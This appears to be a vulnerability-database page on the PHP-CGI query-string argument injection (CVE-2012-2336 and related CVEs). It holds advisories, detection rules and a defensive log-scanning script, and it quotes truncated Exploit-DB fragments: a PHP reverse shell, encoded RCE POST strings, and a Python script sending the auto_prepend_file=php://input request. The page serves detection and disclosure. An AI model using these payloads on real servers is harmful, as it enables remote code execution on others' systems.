CVE-2012-2336
Published 2012-05-11
Priority: P2 · 70 · medium; CVSS 2.0: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
Exploit status: exploited in the wild (ITW); listed in VulnCheck KEV
EPSS: 50.72% (98.8th percentile)
sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to cause a denial of service (resource consumption) by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'T' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823.
Affected
107 ranges (25 shown on the source page; only one carries version data):
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php | php | <= 5.3.12 | — |
Detection & IOCs (extracted from sources)
Command-line IOC: -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
- Detect PHP-CGI argument injection by looking for HTTP requests where the query string contains no '=' character but includes URL-encoded PHP CLI flags (e.g., %2D%64 / -d, %2D%6E / -n) separated by '+' characters targeting php-cgi paths such as /cgi-bin/php.
- Alert on HTTP requests to php-cgi endpoints where the query string begins with a '+- ' sequence, as this pattern is specifically associated with the incomplete CVE-2012-1823 fix bypass (CVE-2012-2335/CVE-2012-2336).
- Detect exploitation attempts by monitoring for HTTP POST requests to CGI-handled PHP scripts with query strings containing URL-encoded '-d auto_prepend_file=php://input' and a POST body containing PHP code, combined with Content-Type: application/x-www-form-urlencoded.
- Vulnerability check probe: detect HTTP requests to php-cgi with query string '?-s' (source display flag); a 200 response containing PHP source markup indicates a vulnerable target.
- Monitor for HTTP responses containing 'Parse error:' or 'Warning:' strings in reply to CGI query-string probe requests, as exploit tools use these patterns to confirm PHP-CGI vulnerability.
- This vulnerability only affects PHP when deployed as a CGI binary (php-cgi). PHP running as an Apache module (mod_php) is NOT affected.
- CVE-2012-2336 is an incomplete fix for CVE-2012-1823; systems patched to PHP 5.3.12 / 5.4.2 (the initial CVE-2012-1823 fix) remain vulnerable. The complete fix requires PHP 5.3.13+ or 5.4.3+.
- The exploit also bypasses several PHP hardening settings (safe_mode, open_basedir, disable_functions, suhosin) by injecting -d directives via the query string, so those controls cannot be relied upon as mitigations on vulnerable php-cgi versions.
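The detection rules above, turned into a log-scanning check. This is an added example written for this page, not code from PHP, any vendor advisory, or any of the exploit authors listed below. It mirrors the vulnerable php-cgi parsing (a query string with no literal '=' is split on '+' and each piece URL-decoded into argv), so encoded '=' (%3D) and the '+-' prefix are caught. The access-log format, the sample entries and the assumption that /cgi-bin/php and *.php paths are dispatched to php-cgi are all constructed for illustration.

```python
"""Flag php-cgi argument-injection requests (CVE-2012-1823 family, incl. CVE-2012-2336) in access logs.

Added example for this page; not code from PHP, Red Hat, Ubuntu or any exploit author.
Assumptions: Common Log Format request lines, and that /cgi-bin/php* and *.php paths
are handled by php-cgi (hypothetical mapping; tune _PHP_CGI_PATH_RE to your deployment).
"""
import re
from typing import Optional
from urllib.parse import unquote

# Request line inside a CLF/combined access-log entry: "METHOD target HTTP/x.y"
_REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Assumed php-cgi dispatch paths (hypothetical; adjust to the real handler mapping).
_PHP_CGI_PATH_RE = re.compile(r"(?:/cgi-bin/php[^/]*|\.php)$", re.IGNORECASE)

# Severity labels returned in findings.
SEV_RCE = "code execution attempt"
SEV_SOURCE = "source disclosure probe"
SEV_DOS = "denial of service (CVE-2012-2336 -T/-h)"
SEV_GENERIC = "argument injection"


def analyze_request(target: str) -> Optional[dict]:
    """Return a finding for a php-cgi argument-injection request target, else None.

    Mirrors the vulnerable php-cgi behaviour: only when the raw query string holds
    no literal '=' is it split on '+' and URL-decoded piecewise into argv.
    """
    path, _, raw_query = target.partition("?")
    if not raw_query or not _PHP_CGI_PATH_RE.search(path):
        return None
    if "=" in raw_query:  # a literal '=' makes php-cgi treat it as an ordinary query
        return None
    tokens = [unquote(piece) for piece in raw_query.split("+")]
    options = [tok for tok in tokens if tok.startswith("-")]
    if not options:
        return None

    reasons = []
    if raw_query.startswith("+-"):
        reasons.append("leading '+-' sequence (CVE-2012-2335 wrapper bypass)")
    decoded = " ".join(tokens)
    if "auto_prepend_file" in decoded or "allow_url_include" in decoded:
        severity = SEV_RCE
        reasons.append("-d ini override enabling php://input code inclusion")
    elif "-s" in options:
        severity = SEV_SOURCE
        reasons.append("-s source display flag")
    elif any(opt in ("-T", "-h") for opt in options):
        severity = SEV_DOS
        reasons.append("unfiltered -T/-h option")
    else:
        severity = SEV_GENERIC
        reasons.append("CLI-style options in '='-less query string")
    return {"path": path, "options": options, "tokens": tokens,
            "severity": severity, "reasons": reasons}


def scan_log(lines) -> list:
    """Run analyze_request over access-log lines; return (line_no, finding) pairs."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = _REQUEST_RE.search(line)
        if not match:
            continue
        finding = analyze_request(match.group("target"))
        if finding:
            finding["method"] = match.group("method")
            findings.append((lineno, finding))
    return findings


# Constructed sample entries: benign, benign without '=', -s probe, RCE attempt,
# '+-' wrapper bypass, -T DoS, and a non-PHP CGI path that must not be flagged.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/May/2012:10:00:01 +0000] "GET /index.php?page=home&id=3 HTTP/1.1" 200 512',
    '203.0.113.5 - - [11/May/2012:10:00:02 +0000] "GET /index.php?home HTTP/1.1" 200 512',
    '198.51.100.7 - - [11/May/2012:10:00:03 +0000] "GET /cgi-bin/php?-s HTTP/1.1" 200 2048',
    '198.51.100.7 - - [11/May/2012:10:00:04 +0000] "POST /index.php?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 200 77',
    '198.51.100.7 - - [11/May/2012:10:00:05 +0000] "GET /cgi-bin/php?+-s HTTP/1.1" 200 2048',
    '198.51.100.7 - - [11/May/2012:10:00:06 +0000] "GET /cgi-bin/php?-T+1000000 HTTP/1.1" 500 0',
    '203.0.113.9 - - [11/May/2012:10:00:07 +0000] "GET /cgi-bin/status?-s HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for lineno, f in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {f['method']} {f['path']} -> {f['severity']}; " + "; ".join(f["reasons"]))
```

The raw (undecoded) query string is what has to be inspected for the '=' check: the exploit in the Exploit-DB entry below writes its directives as `-dallow_url_include%3don`, which contains no literal '=' yet decodes to one, so a detector that decodes first would miss it.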
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:N/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |
| vendor_redhat | — | 9.8 | CRITICAL | — |
| vendor_ubuntu | — | 5.0 | MEDIUM | — |
GHSA
GHSA-gjrg-p28q-p9w2: sapi/cgi/cgi_main
ghsa_unreviewed · 2022-05-14 · CVSS 9.8 · CRITICAL · CWE-20
VulnCheck
PHP PHP Improper Input Validation
vulncheck · 2012 · CVSS 9.8 · CRITICAL
Affected: PHP PHP
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.bleepingcomputer.com/news/security/linux-and-windows-servers-targeted-with-rub
Ubuntu
PHP vulnerabilities
vendor_ubuntu · 2012-06-19 · CVSS 5.0 · CVE-2012-0781 [MEDIUM]
Title: PHP vulnerabilities
Summary: Several security issues were fixed in PHP.
It was discovered that PHP incorrectly handled certain Tidy::diagnose operations on invalid objects. A remote attacker could use this flaw to cause PHP to crash, leading to a denial of service. (CVE-2012-0781)
It was discovered that PHP incorrectly handled certain multi-file upload filenames. A remote attacker could use this flaw to cause a denial of service, or to perform a directory traversal attack. (CVE-2012-1172)
Rubin Xu and Joseph Bonneau discovered that PHP incorrectly handled certain Unicode characters in passwords passed to the crypt() function. A remote attacker could possibly use this flaw to bypass authentication. (CVE-2012-2143)
It was discovered that a Debian/Ubuntu specific patch caused PHP
Red Hat
php: command line arguments injection when run in CGI mode (VU#520827)
vendor_redhat · 2012-05-03 · CVSS 9.8 · CVE-2012-1823 [CRITICAL]
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
Statement: This flaw did not affect the versions of PHP in Red Hat Enterprise Linux 3 or 4. Updates were released for Red Hat Enterprise Linux 5 and 6 (RHSA-2012:0546, RHSA-2012:0547), Red Hat Enterprise Linux 5.3 Long Life (RHSA-2012:0568), Red Hat Enterprise Linux 5.6, 6.0, and 6.1 Extended Update Support (RHSA-2012:0568, RHSA-2012:0569), and Red Hat Appli
Red Hat
php: incomplete CVE-2012-1823 fix - insecure wrapper
vendor_redhat · 2012-05-03 · CVSS 9.8 · CVE-2012-2335 [CRITICAL]
php-wrapper.fcgi does not properly handle command-line arguments, which allows remote attackers to bypass a protection mechanism in PHP 5.3.12 and 5.4.2 and execute arbitrary code by leveraging improper interaction between the PHP sapi/cgi/cgi_main.c component and a query string beginning with a +- sequence.
Statement: The mitigation for CVE-2012-2335 is included in the following PHP updates for Red Hat Enterprise Linux 5 and 6, which also address CVE-2012-2336 (BZ#820708):
https://rhn.redhat.com/errata/RHSA-2012-1045.html
https://rhn.redhat.com/errata/RHSA-2012-1046.html
https://rhn.redhat.com/errata/RHSA-2012-1047.html
Package: php (Red Hat Enterprise Linux 4) - Not affected
Package: php (Red Hat Enterprise Linux 5) - Affected
Pac
Red Hat
php: incomplete CVE-2012-1823 fix - missing filtering of -T and -h
vendor_redhat · 2012-05-03 · CVSS 9.8 · CVE-2012-2336 [CRITICAL] · CWE-228
Package: php (Red Hat Enterprise Linux 4) - Not affected
No detection rules found.
Exploit-DB
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner
exploitdb · 2013-10-31
Apache + PHP array("pipe", "r"), 1 => array("pipe", "w"),2 => array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {exit(1);}stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");while (1) {
if (feof($sock)) {printit("ERROR: Shell connection terminated");break;}
if (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);}if (in_array($pipes[1], $r
Exploit-DB
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution
exploitdb · 2013-10-29 · CVSS 9.8 · CRITICAL
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
typedef struct {
int sockfd;
SSL *handle;
SSL_CTX *ctx;
} connection;
void usage(char *argv[])
{
printf("usage: %s " \
" [--force-interpreter interpreter]\n",
argv[0]);
exit(1);
}
char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" \
"%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" \
"+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" \
"%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" \
"%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" \
"%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" \
"%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" \
"%%6F%%5F%
Exploit-DB
PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection
exploitdb · 2012-05-05
PHP """
post_Length = len(pwn_code)
http_raw="""POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %s
%s
""" %(HOST , post_Length ,pwn_code)
print http_raw
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, int(PORT)))
sock.send(http_raw)
data = sock.recv(10000)
print repr(data)
sock.close()
except socket.error, msg:
sys.stderr.write("[ERROR] %s\n" % msg[1])
sys.exit(1)
if __name__ == '__main__':
try:
HOST = sys.argv[1]
PORT = sys.argv[2]
cgi_exploit()
except IndexError:
print '[+]Usage: cgi_test.py site.com 80'
sys.exit(-1)
Exploit-DB
PHP 5.3.12/5.4.2 - CGI Argument Injection (Metasploit)
exploitdb · 2012-05-04
---
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'PHP CGI Argument Injection',
'Description' => %q{
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to
an argument injection vulnerability. This module takes advantage of
the -d flag to set php.ini directives to achieve code execution.
From the advisory: "if there is NO unescaped '=' in the query string,
the string is split on '+' (encoded space) characters, urldecoded,
passed to a function that escapes shell metacharacters (th
Bugzilla
CVE-2012-2335 php: incomplete CVE-2012-1823 fix - insecure wrapper
bugzilla · 2012-05-11 · CVSS 9.8 · CRITICAL
CVE-2012-1823 was assigned to a PHP-CGI flaw that could allow remote attackers to execute arbitrary code by injecting php-cgi command line arguments via a specially crafted query string. Refer to bug #818607 for details about this flaw.
The released fix for this issue was reported to be incomplete and can be bypassed by prefixing the query string with spaces (e.g. ?+-s). However, that problem only affected configurations using an insecure wrapper script similar to the one pointed out in the CVE-2012-1823 reporter's blog post:
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
http://www.php.net/archive/2012.php#id2012-05-06-1
http://wiki.dreamhost.com/PHP.ini#Create_the_script_wrapper
While this problem is not a
Bugzilla
CVE-2012-2336 php: incomplete CVE-2012-1823 fix - missing filtering of -T and -h
bugzilla · 2012-05-10 · CVSS 9.8 · CRITICAL
Originally Common Vulnerabilities and Exposures assigned an identifier CVE-2012-1823 to the following vulnerability:
A flaw was found in the way the php-cgi executable processed command line arguments when running in CGI mode. A remote attacker could send a specially-crafted request to a PHP script that would result in the query string being parsed by php-cgi as command line options and arguments. This could lead to the disclosure of the script's source code or arbitrary code execution with the privileges of the PHP interpreter. (CVE-2012-1823)
This problem is described in more detail in dedicated bug 818607.
Later it was also reported:
https://bugs.php.net/bug.php?id=61910#1336220802
http://ww
Bugzilla
CVE-2012-2311 php: incomplete CVE-2012-1823 fix - incorrect check for =
bugzilla · 2012-05-04 · CVSS 9.8 · CRITICAL
It was discovered that the fix that was applied in PHP versions 5.3.12 and 5.4.2 to address CVE-2012-1823 (bug #818607) was incomplete and did not resolve the problem. A remote attacker could still use this flaw to remotely execute arbitrary code on servers using affected PHP CGI configurations.
The problem was noted in the blog post of the CVE-2012-1823 issue reporter:
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
UPDATE3: The new PHP release is buggy. You can use their workaround, but
the new releases and their patch do not fix the issue. Use our
mitigations for now.
[...]
UPDATE5: We have received word that new PHP updates with the revised fix
will be released soon. The issue that this prob
Bugzilla
CVE-2012-1823 php: command line arguments injection when run in CGI mode (VU#520827)
bugzilla · 2012-05-03 · CVSS 9.8 · CRITICAL
A flaw was found in the way the php-cgi executable processed command line arguments when running in CGI mode. A remote attacker could send a specially-crafted request to a PHP script that would result in the query string being parsed by php-cgi as command line options and arguments. This could lead to the disclosure of the script's source code or arbitrary code execution with the privileges of the PHP interpreter.
References:
https://bugs.php.net/bug.php?id=61910
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
http://ompldr.org/vZGxxaQ
Discussion:
PHP 5.3.12 and 5.4.2 are released to correct this:
http://www.php.net/archive/2012.php#id2012-05-03-1
They also note the mitigation/workaround
References
http://lists.opensuse.org/opensuse-security-announce/2012-06/msg00004.html
http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00003.html
http://secunia.com/advisories/49014
http://www.php.net/ChangeLog-5.php#5.4.3
http://www.php.net/archive/2012.php#id2012-05-08-1
https://bugs.php.net/bug.php?id=61910
https://bugs.php.net/patch-display.php?bug_id=61910&patch=CVE-2012-1823.patch&revision=1336251592&display=1
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862